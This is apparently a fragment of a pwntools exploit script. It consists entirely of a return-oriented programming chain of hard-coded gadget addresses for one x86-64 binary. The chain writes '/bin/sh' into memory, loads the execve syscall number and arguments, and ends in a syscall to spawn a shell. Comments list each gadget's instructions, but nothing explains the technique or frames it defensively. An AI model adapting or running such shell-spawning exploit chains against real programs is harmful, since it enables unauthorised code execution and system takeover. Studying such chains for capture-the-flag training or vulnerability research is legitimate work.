payload = p64(0x405889)
#0x0000000000405889: pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x40f1c0)+p64(0x407a4b)
# 0x0000000000407a4b: mov qword ptr [rbp + 0x50], rbx; add rsp, 8; pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x405889)
# 0x0000000000405889: pop rbx; pop rbp; ret; 
payload += p64(0x68662f6e69622f)+p64(0x40f020)+p64(0x407a4b)
# 0x0000000000407a4b: mov qword ptr [rbp + 0x50], rbx; add rsp, 8; pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4033a9)
# 0x00000000004033a9: pop rdi; pop rbp; ret; 
payload += p64(0x40f204)+p64(0x0)+p64(0x407943)
# 0x0000000000407943: pop rsi; ret; 
payload += p64(0x40f200)+p64(0x406356)
# 0x0000000000406356: mov edx, dword ptr [rdi + 0xc]; mov dword ptr [rsi + 0xc], edx; ret; 
payload += p64(0x407943)
# 0x0000000000407943: pop rsi; ret; 
payload += p64(0x0)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x3b)+p64(0x4072ab)
# 0x00000000004072ab: mov eax, ebp; pop rbx; pop rbp; pop r12; pop r13; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4033a9)
# 0x00000000004033a9: pop rdi; pop rbp; ret; 
payload += p64(0x40f070)+p64(0x0)+p64(0x4039c0)
# 0x00000000004039c0: syscall; 
payload += b''
